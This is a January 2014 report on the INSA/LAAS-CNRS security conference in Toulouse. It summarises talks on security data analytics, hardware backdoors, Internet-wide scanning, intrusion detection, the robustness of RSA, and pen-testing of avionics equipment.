Report on the security conference INSA-2014
Date : January 27, 2014
The French Engineering school INSA, and the LAAS-CNRS research institute have organized a one-day conference on security in Toulouse on January 23rd, 2014. A set of famous French and Belgium speakers were invited to speak during this day. They have presented subjects mostly oriented on research (among topics such as big data, intrusion detection or cryptographic robustness) or on highly technical topics (such as hardware backdoors, mass scanning, or pen-test against avionic devices).
We present below a quick report for this day. The presentation material will be available shortly on the conference website.
Security and Big Data Analytics
By: Marc Dacier (Symantec Research Lab)
The speaker presented 2 research projects of Symantec Research Lab: WINE and TRIAGE. Both are the continuation of works initialized within the European project WOMBAT, which we described in 2009 in 2 articles: The state-of-the-art for Honeypot systems and Report for the SSTIC 2009 conference.
WINE (Worldwide Intelligence Network Environment) is a platform available for researchers upon request. It provides real data sets collected by Symantec from various security sensors, and ensures that these datasets are properly archived and could be replayed. The objective of this project is to provide a "scientific" environment to conduct experiments under controlled conditions. A description of the WINE platform is available here: www.symantec.com/WINE
TRIAGE is a data-mining technique that can be used to identify similarities that exist in a dataset. For example, when applied to a dataset made of malicious emails, TRIAGE is able to identify all emails belonging to the same attack campaign and to describe how the campaign did evolve (by showing the successive changes that occurred, such as the change in the subjects of email at sites relay attacks, etc. ..). The TRIAGE method used similarity search techniques (such as the Choquet ‘s integrals technique) to identify MCD (Multi Dimensional Cluster) in the dataset. MCD visualization is then done by using www.vis-sense.eu (a European project on data visualization). A more complete description of TRIAGE by Symantec (and example of MCD visualization) is available here.
More on WINE and TRIAGE: http://seminaire-dga.gforge.inria.fr/2012/20130607-FredHollowood.pdf
Cyber-defense and hardware security: how far should we go?
By: Loic Duflot (Manager of the « Sous-direction Expertise » at the French ANSSI gov-agency)
After a short presentation on the ANSSI, the speaker used a series of examples to demonstrate that there are many topics to explore in the field of hardware security and hardware level backdoors:
- At the BIOS level, it is possible for example to develop a root-kit exploiting the SMM (System Management Mode) feature of the Intel processors. A Cert-IST article released in 2009 further details this.
- On some network cards, it was possible to install a backdoor by exploiting, via RMCP (Remote Management and Control Protocol), a weaknesses in the implementation of the ASF (Alert Standard Format). An ANSSI article released in 2010 further details this.
- What are the undocumented x86 Intel “op-codes" for? Are they related to a backdoor?
- Can we trust a USB device? USB standard is generic, and a purpose-built USB device could masquerade itself as any type of USB device. It can try that way to cause unexpected conditions that could cause faults in the USB driver of the USB host.
Experience shows that until recently, hardware components have mostly been designed without taking into account possible attacks, and few defenses have been put in place. This opens a wide field of insecurity for all these equipments. The speaker concluded his presentation by recommending:
- To disable all unnecessary features (e.g. in the BIOS setup),
- To integrate security in the design of new hardware components.
Recon phase for cyber-attacks: what can be found on the Internet?
By: Frédéric Raynal (Founder of QuarksLab company)
The speaker presented an internal project by QuarksLab, which aims at performing large-scale scans to build a database containing information about all the computers found in a country or a large company.
The approach to achieve this is to:
- First identify all IP belonging to the targeted country using GeoIP (a worldwide geo-location database. The best known GeoIP service is www.maxmind.com).
- Then, scan IPs using Nmap and NSE scripts to get as much information as possible about each machine (open ports, service banners, etc ...).
- Finally, store all the gathered data in a MongoDB database.
The speaker explained the various aspects that lead him to adopted this approach, and in particular:
- The choice to perform active scans instead of passive traffic in order to capture to collect data,
- The requirement to not disrupt the scanned network,
- The choice of the tools used for collecting information,
- The storage of collected data,
- Performance.
In terms of performance, the speaker said that the scan of a whole country such as Luxembourg (1 million IPs), with 3 machines, and limited to the top 20 ports, requires about 12 hours. By comparison, the same type of scan, using the Amazon Cloud service with 80 virtual machines, could have been done in 45 minutes. It is possible to use faster scanners, such as masscan (see the "data-plane networking" section of our Brucon-2013 report) or zmap, but the flow of generated data and the consumed bandwidth then introduce nontrivial problems.
The speaker mentioned several other similar works: Rapid7, Internet Census 2012, Shodan, or even the LHKF project (Low Hanging Kiwi Fruits, see this presentation from Hack.Lu-2011). Finally, he mentioned a U.S. company (Endgame System) which, according to secret documents stolen from HBGary, sells the same kind of service to U.S. government agencies (see this article from the website Risky.biz for more details).
New developments for Intrusion Detection?
By: Ludovic Mé (Research supervisor at Supelec/INRIA/CNRS)
The speaker first made a brief recap on the general principles driving intrusion detection. He explained in particular:
- 2 types of solution: the first one is based on attack scenario analysis and signatures to detect them, and the second one is based on behavioral analysis. Today most of the IDS products adopt the first approach.
- 2 properties used to evaluate IDS effectiveness: reliability (no false negative) and relevance (no false positives).
He then noted the difficulty in obtaining good results with the current IDS. This "failure" is due in particular to a statistical phenomenon known as "base-ref fallacy". This leads to a situation where an IDS with a theoretical detection rate of 90%, will actually trigger 92% of false alarms.
To improve the IDS two possible approaches were considered:
- Reprocess the generated alarms to eliminate false positives. The technique here is essentially based on correlation: if several related alarms are generated, then there is a high probability that an incident actually happened.
- Generate better alarms.
For this latter approach, the speaker presented a list of ideas and exposed in more details two of them:
- Take into account the security policy of the company. In fact, most IDS today make detection without any knowledge about the security policy of the company where they run. And taking into account such policy should indeed greatly enhance the performance of the IDS. The project www.blare-ids.org is an example of such IDS.
- Incorporate techniques derivated from the safety science, and for example implement the "functional diversification" safety concept. In this concept, several independent devices perform the same task in parallel: if one of the devices produces a different result, this means that this device is faulty and an alarm is triggered. Using this as a model, we could therefore detect intrusions on a website by sending user requests in parallel (and redundantly) to several independent web servers: if one of these web servers had a different behavior, this meant that it has been compromised.
In conclusion, the speaker gave a series of recommendations to develop new approaches for IDS:
- Do not make assumptions (this implies to use a behavioral approach?),
- Specialize and multiply detectors (avoid “one-size-fits-all” solutions),
- Do not limit IDS to Network-IDS (and uses Host-IDS as well),
- Take the context into account to make better correlations.
What would happen if cryptography stopped working ...
By: Jean-Jacques Quisquater (Cryptographer, Professor Emeritus of the Catholic University of Louvain)
Jean-Jacques Quisquater is a world renowned expert in cryptography. The purpose of the presentation was to know whether the RSA algorithm had been broken. And after listening to his brilliant presentation, we must recognize that real doubts exist.
First, he recalled that the robustness of the RSA algorithm (invented in 1977) relies on the difficulty of factoring large numbers. But there are several examples in the history where mathematicians were able to factor very large numbers (in 1643 Fermat was able to factor the Mersenne number, and at the end of the 19th century several scientists were able to factor the Jevons’ number), and nobody knows the method they used to get there. It is therefore possible that a forgotten (or still undiscovered) mathematical method exists to break RSA. If such a discovery ever happens, this will have catastrophic consequences because the RSA algorithm is used everywhere in all security solutions.
The assumption that a method for breaking RSA might exist is obviously taken very seriously. For instance, the U.S. government organized a closed seminar in January 2013, entitled "The end of RSA" (which was attended by the speaker) intending to provide recommendations to DoD to prepare for this eventuality. The slides for this event are available on the CATACRYPT 2013 website.
Research and security pentests on sensitive industrial technologies
By: Stéphane Duverger and Benoît Camredon (Airbus Group - Innovation Works)
The speakers gave a feedback to the audience about intrusive audits they have performed on avionics products. One of the main difficulties they encountered is the fact that the audited hardware was very exotic:
- Non-standard connectors,
- Proprietary protocols,
- Specific architectures and OS.
A huge effort was then needed to understand how the equipment works (a Google search is very unlikely to provide an answer here!) and to find in it similarities with known IT systems and ideas for possible attacks.
Another difficulty was the limited availability of audited equipments. They are often only available on a test bench, with strict planning for the intervention of all the specialists. Also, the test bench sometimes provides no tool adapted to pen-tester needs (such as execution traces), and it is often difficult to verify whether the attack that has been tested produced a significant result.
Conclusion
This conference day for both students and industrials was a first for the Toulouse INSA School. This was a real success, with a set of very high quality presentations all along the day. These presentations addressed both research topics and highly technical subjects; this mix was an ideal ground for sharing ideas among attendees whose were academics, students and professionals.